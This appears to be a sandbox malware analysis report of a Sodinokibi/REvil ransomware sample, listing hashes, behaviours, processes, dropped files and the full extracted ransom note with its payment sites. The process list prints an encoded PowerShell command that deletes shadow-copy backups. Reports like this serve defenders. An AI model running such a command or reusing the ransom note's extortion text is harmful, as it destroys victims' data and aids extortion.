Overview

overview

10

Static

static

10

d3e026324b...18.exe

windows7-x64

10

d3e026324b...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-09-2024 07:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d3e026324b81c755f9058d7a42e96c75_JaffaCakes118.exe

  • Size

    165KB

  • MD5

    d3e026324b81c755f9058d7a42e96c75

  • SHA1

    35d30a689c4b826e43d9255574fa09965c0a6ba7

  • SHA256

    f7c922293637486c307b6d1f05da1eb686a330c527981e0b0f079602e9cfd3d3

  • SHA512

    e9eb060168da1db8dafac357835ffc2272dc3fdbae31c77d810c188299657c824255cc1f337ac25420c57ebe821a838f4e92e5fdf7778a4a6692e777305b3913

  • SSDEEP

    3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/Na/CUtnBr8rl2a:lw02sJPi7O93NSnBkl

Score
10/10
sodinokibidiscoveryransomware

Malware Config

Extracted

Path

C:\Users\v2264g4-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. CDHFUND. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension v2264g4. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A064A2D02E6C7F51 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/A064A2D02E6C7F51 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Xfwt/du9tm4sw5/1XlCi8i7p0XDMrFBNHZjmBSTPi/IzsfXpA9JwpS/QJXiz/QhY i00Gamx7udAIMdwpy50QWrZOPK72xBQb8zd1Ja8b1Fij0N0pk6uOyrbwOFnVS72u g1MITnWpsLvlhP0IhBKnV9LlHFoRAVWJeKDMJRHszdBFChIr5NaC2sV+yVMMu2qb MdVUN3l7zygLfEXKT+Q7GD+GKuybNt+M2zud+V8eWAEvujZ8mF5I53bjQ0W7D+pJ ouOlsUfhpaMwfp4fELJ912giuUQPJfYDTs+EQqXKDiRCn9AVu4TC4Qo34OLwb86r 7jHiRYKOKRPZJ9k7cUGXHnA2rvTdSz/5DfqkmEJK7fPTnwx5FtPLFnYAPPWm3fBh xlWtZSPlzs3NDdineBY0cQqHMRxGnwi+oUFFNFpDyo2z1yBRc7+1dUGvB3nqDoIu wmqrIIoFWW8F9X2mMWpkoqt8B3h2u3BrRqvG5OqvR8VkHVkcLQ/SN8G950WhM3C8 t6nZNqJKcNK3E56ZGgOOxE2KI1mFkuq+yruRUJZCL8GgUNAvICPtMPSNmKrjZTwd A+G+3cKAxP4a7jtBZmCa2PVEvq65MQxr2/lMxIhzi91kvAl7ipfcyQhWmbul8Iix i9OFPBlZ7QsJHTtAY9uFffG2vWUebk+BuO6MbbT3S/p8bfjEUuWte2x2IFGZ4OuU m6BM3QBCkTfScmM4NcV92hlJ/coiNzGTZkew7qbNpRSfpM1rR7sZeQtEZi46dSi8 IDSR70ACZZt9jveZaJ7fFX/StHIdZJ6bwSoRUGMf+1yiOac/14UIUjNPu+gDeYUo Z77KGw8BnF1nqoJ0JO2iluuNqhuyikEfjxnIdVkieF6N2FhGyfVx70qJ3KTqruOA 0bokfBG63Agvio0QKA/pqTqKGPglbc5nHtpVHQbMCAMuPswSbP0vaXJ1AWMOBMLr 7RsgaTDObk7P6Wa9kmZSbLkt2UllKufRe9iv2PamnrImKzDIxJQDTHDe80WZbTP4 BBkSmmpIuraIyJ8JlhbhGYCxpjRAk/TKsOm52Yo0803HkmPyMOhnOyqvzAyesh9w o9p+7UYrDImXSq8pRpyE6au8duuVLTJaVV5e+GjYDd+kRrOOSk5gI+NaWtF/fr1A RB/lB5n1a3upl+G70FVtxR0XBf7xoLBEtHoNZNRtPVDBSv493IZi1Bdt9d7sFGl9 krCPh/Hh1WYpwn7sMiEFiREWZL4= Extension name: v2264g4 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A064A2D02E6C7F51

http://decryptor.top/A064A2D02E6C7F51

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 32 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\d3e026324b81c755f9058d7a42e96c75_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d3e026324b81c755f9058d7a42e96c75_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3112
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2640
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1796

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_prc03q44.fda.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\v2264g4-readme.txt
      Filesize

      6KB

      MD5

      3c4ce54f1dd3d8a3a639cfb8b9585a45

      SHA1

      737f3b816e18648f27e8ca0779bf788a25373392

      SHA256

      a596128fd243f542269c66bfae471d4390169ab3a1c2508b1f5dbed473486f26

      SHA512

      862ed02fb5d709f3072be9737da2a10b60f048a9408de0148386a1a0749e98340e61ab4fdb396df2a7215c2f44149740529bef050aabc890d062a19910a651cd

      Download Submit

    • memory/3112-0-0x00007FFA3ECF3000-0x00007FFA3ECF5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3112-10-0x000001EDF63E0000-0x000001EDF6402000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3112-11-0x00007FFA3ECF0000-0x00007FFA3F7B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3112-12-0x00007FFA3ECF0000-0x00007FFA3F7B1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3112-15-0x00007FFA3ECF0000-0x00007FFA3F7B1000-memory.dmp

      Filesize

      10.8MB

      Download